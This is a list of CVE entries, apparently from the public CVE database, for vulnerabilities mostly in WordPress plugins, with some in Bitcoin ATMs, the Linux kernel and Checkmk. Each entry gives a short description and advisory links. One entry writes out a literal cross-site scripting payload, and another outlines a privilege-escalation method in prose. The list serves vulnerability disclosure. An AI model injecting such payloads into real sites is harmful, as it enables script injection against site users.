CVE    2024    681    Candidate    The Page Restriction WordPress (WP) – Protect WP Pages/Post plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.3.4. This is due to the plugin not properly restricting access to pages via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected pages. The vendor has decided that they will not implement REST API protection on posts and pages and the restrictions will only apply to the front-end of the site. The vendor's solution was to add notices throughout the dashboard and recommend installing the WordPress REST API Authentication plugin for REST API coverage.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve    Assigned (20240118)
CVE    2024    680    Candidate    The WP Private Content Plus plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 3.6. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts.    MISC:https://wordpress.org/plugins/wp-private-content-plus/   |   URL:https://wordpress.org/plugins/wp-private-content-plus/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve    Assigned (20240118)
CVE    2024    679    Candidate    The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.    MISC:https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237   |   URL:https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237   |   MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail=   |   URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve    Assigned (20240118)
CVE    2024    678    Candidate    The Order Delivery Date for WP e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'available-days-tf' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221   |   URL:https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve    Assigned (20240118)
CVE    2024    676    Candidate    Weak password requirement vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, which allows a local user to interact with the machine where the application is installed, retrieve stored hashes from the machine and crack long 4-character passwords using a dictionary attack.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines    Assigned (20240118)
CVE    2024    675    Candidate    Vulnerability of improper checking for unusual or exceptional conditions in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, the exploitation of which could allow an attacker with physical access to the ATM to escape kiosk mode, access the underlying Xwindow interface and execute arbitrary commands as an unprivileged user.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines    Assigned (20240118)
CVE    2024    674    Candidate    Privilege escalation vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, which could allow a local user to acquire root permissions by modifying the updatescript.js, inserting special code inside the script and creating the done.txt file. This would cause the watchdog process to run as root and execute the payload stored in the updatescript.js.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines    Assigned (20240118)
CVE    2024    670    Candidate    Privilege escalation in windows agent plugin in Checkmk before 2.2.0p23, 2.1.0p40 and 2.0.0 (EOL) allows local user to escalate privileges    FULLDISC:20240313 SEC Consult SA-20240307-0 :: Local Privilege Escalation via writable files in Checkmk Agent (CVE-2024-0670)   |   URL:http://seclists.org/fulldisclosure/2024/Mar/29   |   MISC:https://checkmk.com/werk/16361   |   URL:https://checkmk.com/werk/16361    Assigned (20240118)
CVE    2024    669    Candidate    A Cross-Frame Scripting vulnerability has been found on Plone CMS affecting versions below 6.0.5. An attacker could store a malicious URL to be opened by an administrator and execute a malicious iframe element.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-frame-scripting-xfs-plone-cms   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-frame-scripting-xfs-plone-cms    Assigned (20240118)
CVE    2024    668    Candidate    The Advanced Database Cleaner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.3 via deserialization of untrusted input in the 'process_bulk_action' function. This makes it possible for authenticated attackers, with administrator access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224   |   URL:https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224   |   MISC:https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298   |   URL:https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298   |   MISC:https://plugins.trac.wordpress.org/changeset/3025980/   |   URL:https://plugins.trac.wordpress.org/changeset/3025980/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve    Assigned (20240117)
CVE    2024    667    Candidate    The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the 'execute' function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the 'BoosterController' class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.21/booster/controller.php#L34   |   URL:https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.21/booster/controller.php#L34   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve    Assigned (20240117)
CVE    2024    665    Candidate    The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3025865/customer-area/trunk/src/php/core-addons/admin-area/templates/dashboard-page.template.php   |   URL:https://plugins.trac.wordpress.org/changeset/3025865/customer-area/trunk/src/php/core-addons/admin-area/templates/dashboard-page.template.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve    Assigned (20240117)
CVE    2024    664    Candidate    The Meks Smart Social Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meks Smart Social Widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve    Assigned (20240117)
CVE    2024    663    Candidate    ** REJECT ** : This is a false positive report.        Assigned (20240117)
CVE    2024    660    Candidate    The Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.7.2. This is due to missing or incorrect nonce validation on the update_settings function. This makes it possible for unauthenticated attackers to change form settings and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php   |   URL:https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve    Assigned (20240117)
CVE    2024    659    Candidate    The Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the variable pricing option title in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manager-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve    Assigned (20240117)
CVE    2024    658    Candidate    The Insert PHP Code Snippet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user's name when accessing the insert-php-code-snippet-manage page in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve    Assigned (20240117)
CVE    2024    657    Candidate    The Internal Link Juicer: SEO Auto Linker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings such as 'ilj_settings_field_links_per_page' in all versions up to, and including, 2.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve    Assigned (20240117)
CVE    2024    656    Candidate    The Password Protected – Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Captcha Site Key in all versions up to, and including, 2.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve    Assigned (20240117)
CVE    2024    655    Candidate    A vulnerability has been found in Novel-Plus 4.3.0-RC1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /novel/bookSetting/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251383.    MISC:https://github.com/red0-ZhaoSi/CVE/blob/main/novel-plus/sql/sql_1.md   |   URL:https://github.com/red0-ZhaoSi/CVE/blob/main/novel-plus/sql/sql_1.md   |   MISC:https://vuldb.com/?ctiid.251383   |   URL:https://vuldb.com/?ctiid.251383   |   MISC:https://vuldb.com/?id.251383   |   URL:https://vuldb.com/?id.251383    Assigned (20240117)
CVE    2024    654    Candidate    A vulnerability, which was classified as problematic, was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. Affected is an unknown function of the file mainscripts/Util.py. The manipulation leads to deserialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-251382 is the identifier assigned to this vulnerability.    MISC:https://github.com/bayuncao/vul-cve-4   |   URL:https://github.com/bayuncao/vul-cve-4   |   MISC:https://github.com/bayuncao/vul-cve-4/blob/main/picture/1071705290840_.pic_hd.jpg   |   URL:https://github.com/bayuncao/vul-cve-4/blob/main/picture/1071705290840_.pic_hd.jpg   |   MISC:https://vuldb.com/?ctiid.251382   |   URL:https://vuldb.com/?ctiid.251382   |   MISC:https://vuldb.com/?id.251382   |   URL:https://vuldb.com/?id.251382    Assigned (20240117)
CVE    2024    652    Candidate    A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file search-visitor.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251378 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1YHm4WtiYjbxNAd3FKo85qcdHfn1VJYEl/view?usp=sharing   |   URL:https://drive.google.com/file/d/1YHm4WtiYjbxNAd3FKo85qcdHfn1VJYEl/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.251378   |   URL:https://vuldb.com/?ctiid.251378   |   MISC:https://vuldb.com/?id.251378   |   URL:https://vuldb.com/?id.251378    Assigned (20240117)
CVE    2024    651    Candidate    A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search-visitor.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251377 was assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1J3YaxX9RYZ_41-AYdwrCAPMT-YTqILKr/view?usp=sharing   |   URL:https://drive.google.com/file/d/1J3YaxX9RYZ_41-AYdwrCAPMT-YTqILKr/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.251377   |   URL:https://vuldb.com/?ctiid.251377   |   MISC:https://vuldb.com/?id.251377   |   URL:https://vuldb.com/?id.251377    Assigned (20240117)
CVE    2024    650    Candidate    A vulnerability was found in Project Worlds Visitor Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file dataset.php of the component URL Handler. The manipulation of the argument name with the input "><script>alert('torada')</script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251376.    MISC:https://torada.notion.site/XSS-at-datatest-php-660aabd1437d4df7a492d19a461a1f3c?pvs=4   |   URL:https://torada.notion.site/XSS-at-datatest-php-660aabd1437d4df7a492d19a461a1f3c?pvs=4   |   MISC:https://vuldb.com/?ctiid.251376   |   URL:https://vuldb.com/?ctiid.251376   |   MISC:https://vuldb.com/?id.251376   |   URL:https://vuldb.com/?id.251376    Assigned (20240117)
CVE    2024    649    Candidate    A vulnerability was found in ZhiHuiYun up to 4.4.13 and classified as critical. This issue affects the function download_network_image of the file /app/Http/Controllers/ImageController.php of the component Search. The manipulation of the argument url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251375.    MISC:https://note.zhaoj.in/share/jC6NMe5TRSys   |   URL:https://note.zhaoj.in/share/jC6NMe5TRSys   |   MISC:https://vuldb.com/?ctiid.251375   |   URL:https://vuldb.com/?ctiid.251375   |   MISC:https://vuldb.com/?id.251375   |   URL:https://vuldb.com/?id.251375    Assigned (20240117)
CVE    2024    648    Candidate    A vulnerability has been found in Yunyou CMS up to 2.2.6 and classified as critical. This vulnerability affects unknown code of the file /app/index/controller/Common.php. The manipulation of the argument templateFile leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251374 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/FO8AL78oAeTS   |   URL:https://note.zhaoj.in/share/FO8AL78oAeTS   |   MISC:https://vuldb.com/?ctiid.251374   |   URL:https://vuldb.com/?ctiid.251374   |   MISC:https://vuldb.com/?id.251374   |   URL:https://vuldb.com/?id.251374    Assigned (20240117)
CVE    2024    647    Candidate    A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.251373   |   URL:https://vuldb.com/?ctiid.251373   |   MISC:https://vuldb.com/?id.251373   |   URL:https://vuldb.com/?id.251373   |   MISC:https://www.youtube.com/watch?v=KtDjoJlrpAc   |   URL:https://www.youtube.com/watch?v=KtDjoJlrpAc    Assigned (20240117)
CVE    2024    646    Candidate    An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.    MISC:RHBZ#2253908   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2253908   |   MISC:RHSA-2024:0723   |   URL:https://access.redhat.com/errata/RHSA-2024:0723   |   MISC:RHSA-2024:0724   |   URL:https://access.redhat.com/errata/RHSA-2024:0724   |   MISC:RHSA-2024:0725   |   URL:https://access.redhat.com/errata/RHSA-2024:0725   |   MISC:RHSA-2024:0850   |   URL:https://access.redhat.com/errata/RHSA-2024:0850   |   MISC:RHSA-2024:0851   |   URL:https://access.redhat.com/errata/RHSA-2024:0851   |   MISC:RHSA-2024:0876   |   URL:https://access.redhat.com/errata/RHSA-2024:0876   |   MISC:RHSA-2024:0881   |   URL:https://access.redhat.com/errata/RHSA-2024:0881   |   MISC:RHSA-2024:0897   |   URL:https://access.redhat.com/errata/RHSA-2024:0897   |   MISC:RHSA-2024:1248   |   URL:https://access.redhat.com/errata/RHSA-2024:1248   |   MISC:RHSA-2024:1250   |   URL:https://access.redhat.com/errata/RHSA-2024:1250   |   MISC:RHSA-2024:1251   |   URL:https://access.redhat.com/errata/RHSA-2024:1251   |   MISC:RHSA-2024:1253   |   URL:https://access.redhat.com/errata/RHSA-2024:1253   |   MISC:RHSA-2024:1268   |   URL:https://access.redhat.com/errata/RHSA-2024:1268   |   MISC:RHSA-2024:1269   |   URL:https://access.redhat.com/errata/RHSA-2024:1269   |   MISC:RHSA-2024:1278   |   URL:https://access.redhat.com/errata/RHSA-2024:1278   |   MISC:RHSA-2024:1306   |   URL:https://access.redhat.com/errata/RHSA-2024:1306   |   MISC:RHSA-2024:1367   |   URL:https://access.redhat.com/errata/RHSA-2024:1367   |   MISC:RHSA-2024:1368   |   URL:https://access.redhat.com/errata/RHSA-2024:1368   |   MISC:RHSA-2024:1377   |   URL:https://access.redhat.com/errata/RHSA-2024:1377   |   MISC:RHSA-2024:1382   |   URL:https://access.redhat.com/errata/RHSA-2024:1382   |   MISC:RHSA-2024:1404   |   URL:https://access.redhat.com/errata/RHSA-2024:1404   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0646   |   URL:https://access.redhat.com/security/cve/CVE-2024-0646   |   MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267   |   URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267    Assigned (20240117)
CVE    2024    645    Candidate    Buffer overflow vulnerability in Explorer++ affecting version 1.3.5.531. A local attacker could execute arbitrary code via a long filename argument by monitoring Structured Exception Handler (SEH) records.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-explorer   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-explorer    Assigned (20240117)
CVE    2024    643    Candidate    Unrestricted upload of dangerous file types in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to upload different file extensions without any restrictions, resulting in a full system compromise.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products    Assigned (20240117)
CVE    2024    642    Candidate    Inadequate access control in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to access the application as an administrator user through the application endpoint, due to lack of proper credential management.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cires21-products    Assigned (20240117)
CVE    2024    641    Candidate    A denial of service vulnerability was found in tipc_crypto_key_revoke in net/tipc/crypto.c in the Linux kernel’s TIPC subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.    MISC:RHBZ#2258757   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258757   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0641   |   URL:https://access.redhat.com/security/cve/CVE-2024-0641   |   MISC:https://github.com/torvalds/linux/commit/08e50cf071847323414df0835109b6f3560d44f5   |   URL:https://github.com/torvalds/linux/commit/08e50cf071847323414df0835109b6f3560d44f5    Assigned (20240117)
CVE    2024    639    Candidate    A denial of service vulnerability due to a deadlock was found in sctp_auto_asconf_init in net/sctp/socket.c in the Linux kernel’s SCTP subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.    MISC:RHBZ#2258754   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258754   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0639   |   URL:https://access.redhat.com/security/cve/CVE-2024-0639   |   MISC:https://github.com/torvalds/linux/commit/6feb37b3b06e9049e20dcf7e23998f92c9c5be9a   |   URL:https://github.com/torvalds/linux/commit/6feb37b3b06e9049e20dcf7e23998f92c9c5be9a    Assigned (20240117)
CVE    2024    638    Candidate    Least privilege violation in the Checkmk agent plugins mk_oracle, mk_oracle.ps1, and mk_oracle_crs before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows local users to escalate privileges.    MISC:https://checkmk.com/werk/16232   |   URL:https://checkmk.com/werk/16232    Assigned (20240117)
CVE    2024    631    Candidate    The Duitku Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_duitku_response function in all versions up to, and including, 2.11.4. This makes it possible for unauthenticated attackers to change the payment status of orders to failed.    MISC:https://plugins.trac.wordpress.org/browser/duitku-social-payment-gateway/trunk/woocommerce-gateway-duitku.php#L409   |   URL:https://plugins.trac.wordpress.org/browser/duitku-social-payment-gateway/trunk/woocommerce-gateway-duitku.php#L409   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve    Assigned (20240116)
CVE    2024    630    Candidate    The WP RSS Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the RSS feed source in all versions up to, and including, 4.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator   |   URL:https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve    Assigned (20240116)
CVE    2024    628    Candidate    The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.    MISC:https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator   |   URL:https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve    Assigned (20240116)
CVE    2024    625    Candidate    The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpfront-notification-bar-options[custom_class]’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/browser/wpfront-notification-bar/trunk/templates/template-wpfront-notification-bar.php#L94   |   URL:https://plugins.trac.wordpress.org/browser/wpfront-notification-bar/trunk/templates/template-wpfront-notification-bar.php#L94   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=   |   